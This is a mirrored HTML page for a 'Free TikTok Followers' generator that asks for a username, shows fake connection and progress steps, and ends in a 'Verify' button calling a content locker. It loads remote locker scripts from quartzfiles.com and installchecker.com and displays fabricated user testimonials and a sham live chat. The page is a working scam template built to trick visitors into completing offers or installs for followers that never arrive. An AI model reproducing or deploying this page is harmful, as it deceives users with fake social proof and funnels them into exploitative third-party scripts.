<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from tiktokfree.github.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 30 Aug 2022 05:12:50 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <script src="../kit.fontawesome.com/2fa2e3ba08.js"></script>
  <link href="https://fonts.googleapis.com/css2?family=Mogra&amp;display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Capriola&amp;display=swap" rel="stylesheet">
  <link rel="stylesheet" href="style.css">
  <link href="ios2.css" rel="stylesheet" type="text/css">
  <script type="text/javascript" src="https://quartzfiles.com/script_include.php?id=1203134"></script>
  <title>TikTok Followers</title>
</head>
<body onload="aChat()">
  <div class="mainWrapper">
    <div class="hdr">
      <img class="lgoo" src="images/vectorpaint.svg" alt="" class="lgo">
      <p class="bigH">Free TikTok Followers</p>
      <p class="smallH">Why?</p>
      <p class="smallH">Because We Can!!!</p>
    </div>
    <div class="mainStuff">
      <div class="tHolder">
        <p class="creds">Enter your TikTok Username</p>
        <div class="inp">
          <i class="fas fa-user-plus"></i>
          <input type="text" id="username" name="username" placeholder="@Username">
          <div class="bbt" onclick="butnext()">
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            Lets Go
          </div>
        </div>
      </div>
      <div class="sStep">
        <p class="creds ldrM">Connecting Please Wait</p>
        <div class="lds-roller"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div>
      </div>
      <div class="tStep">
        <div class="statusHolder">
          <p class="cncted">Connected:</p>
           <p class="din">Your Username</p>
        </div>
        <p class="selectP">Number Of Followers</p>
        <div class="packages">
          <div class="ppp" onclick="selectedPackage(event)">
            <img class="sPack" src="images/vectorpaint.svg" alt="">
            <p class="amount">5000</p>
          </div>
          <div class="ppp mid" onclick="selectedPackage(event)">
            <img class="sPack" src="images/vectorpaint.svg" alt="">
            <p class="amount">15000</p>
          </div>
          <div class="ppp" onclick="selectedPackage(event)">
            <img class="sPack" src="images/vectorpaint.svg" alt="">
            <p class="amount">30000</p>
          </div>
        </div>
      </div>
      <div class="fStep">
        <p class="stsss">Preparing Followers For</p>
        <p class="din aaaaa">Your Username</p>
        <div class="apppending">

        </div>
        <div class="progress-wrapper">
          <p class="ll1">Loading... <span class="percentages"></span></p>
          <div class="progress"></div>
        </div>
        <div class="verifyy" onclick="call_locker();" >Verify</div>
        
        <p class="detsss">Followers will be delivered to the provided username account within 20 minutes</p>
      </div>
    </div>

    <div class="secBoxes">
      <div class="main-content" id="cmmnts">
          <div class="comments">
              <p style="margin:0;padding:0;float:left;display:block;width:50%;"><span style="color:white;">Comments of users</span>
              </p>
              <p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right;">50 of 80</p>
              <div style="clear:both;"></div>
          </div>
          <div class="comments" id="comment6" style="display: block;">
              <div class="profile"><img src="images/ii1.jpg">
              </div>
              <div class="comment-content">
                  <p class="name">Callum Davy</p>
                  <p>At first I was sceptical but it actually works
                      <br>
                  </p>
              </div>
              <div class="clr"></div>
              <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">34</span>· Just now</div>
          </div>
          <div class="comments" id="comment5" style="display: block;">
              <div class="profile"><img src="images/ii2.jpg">
              </div>
              <div class="comment-content">
                  <p class="name">Ella Blunt</p>
                  <p>Amazing tool now I have chance to get tiktok followers daily for free</p>
              </div>
              <div class="clr"></div>
              <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">34</span>· Just now</div>
          </div>
          <div class="comments" id="comment4" style="display: block;">
              <div class="profile"><img src="images/ii3.jpg">
              </div>
              <div class="comment-content">
                  <p class="name">Ryan Cowell</p>
                  <p>Nice work guys, I have became your regular visitor
                      <br>
                  </p>
              </div>
              <div class="clr"></div>
              <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">8</span>· Just now</div>
          </div>
          <div class="comments" id="comment3" style="display: block;">
              <div class="profile"><img src="images/ii4.jpg">
              </div>
              <div class="comment-content">
                  <p class="name">Owen Winkler</p>
                  <p>Thank you!! thank you!! thank you!!! Love this!</p>
              </div>
              <div class="clr"></div>
              <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">31</span>· Just now</div>
          </div>
          <div class="comments" id="comment2" style="display: block;">
              <div class="profile"><img src="images/ii5.jpg">
              </div>
              <div class="comment-content">
                  <p class="name">Ben Elibar</p>
                  <p>This is the only working tiktok followers adder that i found, after spending hours of searching. AND ITS FREE!!!</p>
              </div>
              <div class="clr"></div>
              <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">100</span>· Just now</div>
          </div>
          <script type="text/javascript" id="ogjs" src="https://installchecker.com/cl/js/ndv656"></script>
     </div>

     <div class="chat">
       <div class="h2">Live Chat</div>
       <div class="innerchat"></div>
       <div class="innerchatFunctions">
         <input class="inputDisabled" disabled="disabled" type="text" name="" value="Enter your message">
         <div class="chatBtn generate">Send</div>
       </div>
     </div>

    </div>

    <div class="ftr">
      <div class="lnks">
      </div>
      <div class="detailss">
        © Copyright 2020, all rights reserved.
  All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.
      </div>
    </div>

  </div>

  <script src="javascript/javascript.js" charset="utf-8"></script>
  
</body>

<!-- Mirrored from tiktokfree.github.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 30 Aug 2022 05:12:54 GMT -->
</html>
